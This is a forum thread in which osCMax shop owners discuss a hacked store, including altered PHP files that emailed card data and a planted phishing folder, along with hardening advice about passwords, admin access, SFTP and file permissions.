Website Recently Hacked

[michael_s]

Before clicking submit, Select All (ctrl-a) and Copy (ctrl-c). If anything goes wrong, simply create a new reply, and Paste your whole post in one shot (ctrl-v).

I always do this before hitting submit on long posts, just in case something goes wacky.

[wkdwich]

Before clicking submit, Select All (ctrl-a) and Copy (ctrl-c). If anything goes wrong, simply create a new reply, and Paste your whole post in one shot (ctrl-v).

Yea yea I know better.. been there done that but hubby was whining to eat.. and now he'll whine some more

OK so lets try this again. hubby is waiting on dinner now because I really need to rewrite all that

Four things..

#1 change your password from a different computer/connection - if you have a keylogger no matter how many times you change it they will get it

#2. Do not ever save passwords in any browser, email or FTP program

#3 If you have control over your server turn off FTP and only use SFTP

#4 Install KeyScrambler a free ultility that will scramble input of forms and password/user name boxes etc in MSIE, FF and others

A client whos osc is hosted on a shared box got hacked, very similar to what you are describing. This site does not take credit cards, only PayPal.. but the customer can put their credit card info in at PP when they get there.. so there is no storing of any CC info at his osc site.. HOWEVER.. and I have seen this at my own osc install.. when a person chooses PP and does not have a PP account -- the CC# only -- no exp date or CVV# -- will show in the osc control panel and therefore also stored in the DB

My theory is that PP is transmitting the CC info back to the osc cart when the customer pays.. the hacked php files read it from maybe the temp file that is created in whereever you've it set to in the IPN module.. or simply intercepted the response from the PP IPN.. PP MUST be sending the CC info back for it to be written to the order file.. the customer never typed it into the osc cart checkout screens..

I dug deep into the clients hosting account and found files altered just as you described.. all sending information to a master_email address:
tell_a_friend.php, login.php, index.php, create_account.php, checkout_confirmation.php

I also found inside his catalog/images folder a new folder catalog/images/gpx LOADED with folders named with bank names.. within each was several images and a tastey php file -- the site was being used as a phishing site!!

I had a little bit of a hard time trashing those folders.. I had to manually navigate to this gpx folder with wsFTP pro to remove them.

I checked the mail/new folder (this is a cpanel box) and found several mails there.. this client does not have any email account set up with his hosting, he still uses AOL for everything.. so the mails sit and never get checked at all there.. I grabbed them and looked.. now here is the curious thing.. 2 of them with exact time stamps of a particular order - paid using PP - was in there.. these were both bounce notices.. this customers info and I mean ALL his info.. CC#, exp date, CVV # DOB, name, address.. EVERYTHING was attempting to be sent to a now closed gmail account -- not the master_email address I saw in the other files.. Date: Tue, 31 Mar 2009 15:32:18 -0700 My client called this customer and asked him my questions.. when he got to PP, he has a PP account, so he logged in and simply chose which CC associated with his account he wanted to use for this purchase. He did NOT type his CC info into PP at this time.

This particular osc install has always had an issue with the PP IPN never responding to OSC properly.. he gets a "PayPal IPN Invalid Process" email with every order. I do not think this is related to the hack though because you did not mention having any issue like that.

The site is running osCMAX_RC3_0_2 fully patched..

Michael.. I have all the files if you want to see them.. I have crappy logs from the shared box so I have no clue who or who or even when they got in..

I changed his password from here.. he is installing KeyScrambler on every computer in his home and office as we type..

IMHO this was a fairly sophiticated and elaborate mechinism that gathered all the info it needed very quietly..

I will be installing SiteMonitor V 1.7 on all my osc installs ASAP
I am sure I am missing some tid-bit from my lost post.. if it comes to mind I'll be back..


(CTRL+A -- CTRL+C)

[michael_s]

First I want to be clear about this: if using the paypal module, the credit card number is never collected by osCMax, and is never sent back to the cart from paypal. If your cart is collecting CC#'s and storing in the database, the method is not Paypal IPN for the checkout for that order. The module has no facility for entering or storing a cc#. You may want to make sure your paypal module is not also compromised.

Next, I run a lot of osCMax stores and a lot of servers and have personally seen several different hacks on shops. Most of the time, the security hole was elsewhere, not the osCMax application itself.

The first rule: Never use a simple password. It should be 12-15 characters/numbers/symbols at minimum.

Second rule: Never allow public access to your admin panel. A simple .htaccess file can lock out all IP addresses but yours. If your IP changes, SFTP or FTPES to the account and update the .htaccess file with your new IP. There is simply no reason to allow public access to the admin panel - ever.

Third Rule: never use plain text ftp. Always SFTP or preferrably FTPES from a limited user account. Sending un-encrypted credentials is a very easy way to get hacked.

Fourth rule: Always keep file permissions very limited. That means 444 for all php files. 755 or 744 for most directories.

If your host setup requires 777 on folders/files that need to be writable - move to a different host. Seriously. That means they are running PHP as an apache module. That is extremely insescure on a shared server. Basically your account can be written to by any other user account on the server with that setup.

Good security practices are very important and an ongoing thing.

[wkdwich]

Michael..

I agree.. security is deeply important.. and I know his passwords were not great, they are now and while he kicked and carried on I said it stays..

Yea he's on a shared.. and I know this is a base issue..

OK now the paypal_ipn.. he and I run the same module.. his reacts differently than mine.. he does not have any other payment module set except money order/check.. so he has no credit card module installed.. only paypal.. I never installed the CVV modification because he doesnt take payment that way and (this may be on a slight tangent) the invalid IPN emails/notice might have something to do with that..

In my own cart I have had people tell me they chose credit card but were sent to paypal.. my people are not the brightest lights when it comes to computers so I always just wrote it off as to problems behind the keyboard..

I know my own server has not been attacked with any success in over 2 years.. attempts daily.. but no luck..

(sorry of I am jumping around a bit..)

If they chose PP as checkout method, and went to paypal.. they had no opportunity to enter credit card info into the osc checkout screens, yet I'd say maybe 10% or more of all paypal payment method payments, I see the FULL CC number there in my store.. so how did it get there?? Is it possible they chose credit card filled it in, clicked continue then some how went back and now choose PP.. think that might be how it happens??

I actually had one girl from Puerto Rico who chose PP, went there and never completed the payment .. something like 6 times.. each time indeed the order record showed the full CC number but no exp date or CVV info

So with all that said.. please point me to the proper CC and PP modules and I need the CVV modification also..

I was going to add the CVV modification to this particualr clients install not because he needs it, but because it will allow him to click and remove the CC info if it shows up.. I did go into his DB this afternoon and in almost 3000 orders there was 39 that had the full CC info there.. I should have paid more atten to the dates of those orders before I remove the data though..

I know that you have released the new version.. I need to one at a time upgrade.. does the new version have the CVV and delete CC info modification??

[michael_s]

There is no need for a CVV mod if you are using paypal. It is all handled by paypal.

If you are using the sample credit card module that is included in osCMax, stop using it. It is not intended to be used on a real site, and only for testing. You should never use it.

Any order that stores the cc# in the db was not paid via the paypal module, at least not the standard paypal ipn the comes with osCMax.

[wkdwich]

OK gotcha.. would you be a dear and please point me to or email me priv the current paypal_ipn module??

My client does not have the CC module installed at all and I do use it on my site.

[michael_s]

osCommerce Community Add-Ons

[wkdwich]

Michael.. just to be sure.. I belive this version (possibly not the latest release - but this version) was the one that was not deducting coupons?? I'm not sure now.. but I remember back I think it was Sept or so, when PP?? made some changes and the IPN stopped working?? I'm having trouble digging the facts about of my brain.. but somehow I was not getting coupons deducted.. I recall tho using the IPN posted to the coupons and discounts contribution and that fixed that issue... Can I assume this particular IPN PayPal IPN Module 2.3.4.7 that you linked to will deduct the coupons??

[wkdwich]

Michael.. the PP IPN is still not working for me.. I know this is the wrong thread.. do you want me to open a new thread?

[suds]

Your site is infected !!

take backup of database, get your site reset, then reinstall whole site.
your URL posted here is redirecting users.